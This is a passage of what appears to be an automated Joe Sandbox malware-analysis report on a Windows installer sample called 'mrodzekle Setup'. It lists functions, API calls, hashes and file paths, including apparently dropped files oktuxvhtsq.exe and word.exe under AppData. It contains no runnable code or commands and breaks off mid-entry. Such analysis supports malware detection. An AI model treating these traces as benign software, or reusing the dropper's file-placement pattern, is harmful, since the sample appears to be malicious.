                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                  • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                  • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                  • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404292 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                  • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                  • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                  • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                  • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00420538,00000000,?,?), ref: 004043F9
                                  • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 00404405
                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                    • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                    • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                  • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                  • MulDiv.KERNEL32 ref: 004044F0
                                    • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                    • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                    • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $A$C:\Users\user\AppData\Local\Temp
                                  • API String ID: 2624150263-1141227420
                                  • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                  • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                  • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                  • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 123533781-2935972921
                                  • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                  • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                  • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                  • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402671 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                  • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                  • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                  • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F9C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: N$open$.B
                                  • API String ID: 3615053054-720656042
                                  • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                  • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                  • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                  • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,mrodzekle Setup,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F$mrodzekle Setup
                                  • API String ID: 941294808-3382217523
                                  • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                  • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                  • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                  • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004058E6 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • CloseHandle.KERNEL32(00000000), ref: 00405933
                                  • GetShortPathNameA.KERNEL32 ref: 0040593C
                                  • GetShortPathNameA.KERNEL32 ref: 00405959
                                  • wsprintfA.USER32 ref: 00405977
                                  • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                  • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                  • String ID: %s=%s$@!B$[Rename]
                                  • API String ID: 3445103937-2946522640
                                  • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                  • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                  • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                  • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405BBA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                  • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000400), ref: 00405CDD
                                  • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000400), ref: 00405CF0
                                  • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                  • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 00405D3A
                                  • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                  • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                  • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 900638850-216748682
                                  • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                  • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                  • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                  • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DFA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                  • API String ID: 589700163-2943609387
                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                  • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                  • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403EBB Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                  • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                  • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004026AF Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00014A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                  • GlobalFree.KERNEL32(?), ref: 00402758
                                  • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                  • GlobalFree.KERNEL32(00000000), ref: 00402771
                                  • CloseHandle.KERNEL32(?), ref: 00402789
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID:
                                  • API String ID: 3294113728-0
                                  • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                  • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                  • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                  • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E84 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                  • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                  • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                  • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                  • SendMessageA.USER32 ref: 00404F18
                                  • SendMessageA.USER32 ref: 00404F32
                                  • SendMessageA.USER32 ref: 00404F40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                  • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                  • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                  • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404753 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
